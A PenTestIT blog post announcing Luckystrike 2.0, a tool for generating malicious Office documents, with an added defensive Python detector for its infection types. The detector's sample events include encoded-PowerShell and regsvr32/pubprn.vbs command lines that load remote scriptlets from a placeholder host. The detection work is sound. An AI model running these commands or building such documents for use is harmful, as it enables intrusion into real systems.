UPDATE: Luckystrike 2.0!

Type pentestit
Reporter Black
Modified 2017-07-24T20:24:28



My first post about this malicious Microsoft Office document generator covered an older version. However, a few hours ago an update was released: Luckystrike 2.0! Major highlights of this awesome release include full support for Microsoft Word, a new COM scriptlet payload, and Excel DDE infection support. Support for Invoke-Obfuscation is also built in!


What is Luckystrike?

> Luckystrike is an open source script that helps you create malicious Microsoft Office documents using PowerShell’s ability to interface with COM objects.

Changes made to Luckystrike 2.0:

  1. Full support for Microsoft Word output (.doc), as well as Word-based template storage.
  2. Support for Invoke-Obfuscation of PowerShell-based payloads as well as PowerShell Shell commands (e.g. powershell -nop -enc …).
  3. New Payload Type: COM Scriptlets. Receives a URL that points to your scriptlet and can fire it via the following Infection Types (based on amazing @subTee research):
    1. Pubprn.vbs - Example
    2. Regsvr32 - Example
  4. Excel DDE Infection Type added: Research. Note that your first Shell Command payload word is the command run by DDE.
  5. A truckload of bug fixes!
  6. The Luckystrike-API switch allows it to be scriptable. See the Pester script for examples.
  7. The wiki has been updated to make it easy to get assistance.
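
For defenders, the infection types listed above share a process-creation footprint. The following added example (not from the original post or the Luckystrike project) flags it in process-creation events; the event field names, rule names, file paths, and sample events are constructed assumptions.

```python
import re
from pathlib import PureWindowsPath

OFFICE = {"winword.exe", "excel.exe"}
INTERPRETERS = {"powershell.exe", "cmd.exe", "cscript.exe", "wscript.exe", "regsvr32.exe"}
URL = re.compile(r"https?://", re.I)

def _name(path):
    return PureWindowsPath(path).name.lower()

def _encoded_flag(cmdline):
    # PowerShell accepts any prefix of -EncodedCommand (-e, -enc, ...) and the alias -ec.
    for tok in cmdline.split():
        flag = tok[1:].lower()
        if tok[0] in "-/" and flag and (flag == "ec" or "encodedcommand".startswith(flag)):
            return True
    return False

def classify(event):
    """Return the names of the (hypothetical) rules this event trips."""
    parent, child = _name(event["parent_image"]), _name(event["image"])
    cmd = event["command_line"]
    hits = []
    # Robust against command-line obfuscation: keys on process lineage only.
    if parent in OFFICE and child in INTERPRETERS:
        hits.append("office_spawned_interpreter")
    if child == "powershell.exe" and _encoded_flag(cmd):
        hits.append("powershell_encoded_command")
    # regsvr32 or pubprn.vbs handed a URL: scriptlet fetched from a remote host.
    if (child == "regsvr32.exe" or "pubprn.vbs" in cmd.lower()) and URL.search(cmd):
        hits.append("remote_scriptlet")
    return hits

def _ev(parent, image, cmd):
    return {"parent_image": parent, "image": image, "command_line": cmd}

# Constructed sample events (example.invalid never resolves); not real telemetry.
SYS = "C:\\Windows\\System32\\"
EVENTS = [
    _ev("C:\\Office\\WINWORD.EXE", SYS + "powershell.exe", "powershell -nop -enc <base64>"),
    _ev("C:\\Office\\EXCEL.EXE", SYS + "cmd.exe", "cmd.exe /c <command>"),
    _ev("C:\\Office\\EXCEL.EXE", SYS + "regsvr32.exe", "regsvr32 /i:https://example.invalid/a.sct scrobj.dll"),
    _ev(SYS + "cmd.exe", SYS + "cscript.exe", "cscript pubprn.vbs 127.0.0.1 script:https://example.invalid/a.sct"),
    _ev("C:\\Windows\\explorer.exe", SYS + "powershell.exe", "powershell -ExecutionPolicy Bypass -File C:\\ops\\inv.ps1"),
    _ev(SYS + "msiexec.exe", SYS + "regsvr32.exe", "regsvr32 /s C:\\app\\plugin.dll"),
]

def triage(events=EVENTS):
    return [classify(e) for e in events]
```

Because this release builds in Invoke-Obfuscation, the command-line rules are the brittle part; the lineage rule does not depend on command-line text.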

Another relevant change is that the author has moved to a new GitHub repository, so the older version will not show an upgrade prompt. If you have made customizations that you would like to keep, leave the old repository in place and check out the new code in a different directory. However, if you would rather get the new release through the built-in updater than check out a new directory, follow the instructions that the author mentions here. Please read the Wiki before you install this new version.

Download Luckystrike 2.0:

Get Luckystrike 2.0 from its new Git repository here.

The post UPDATE: Luckystrike 2.0! appeared first on PenTestIT.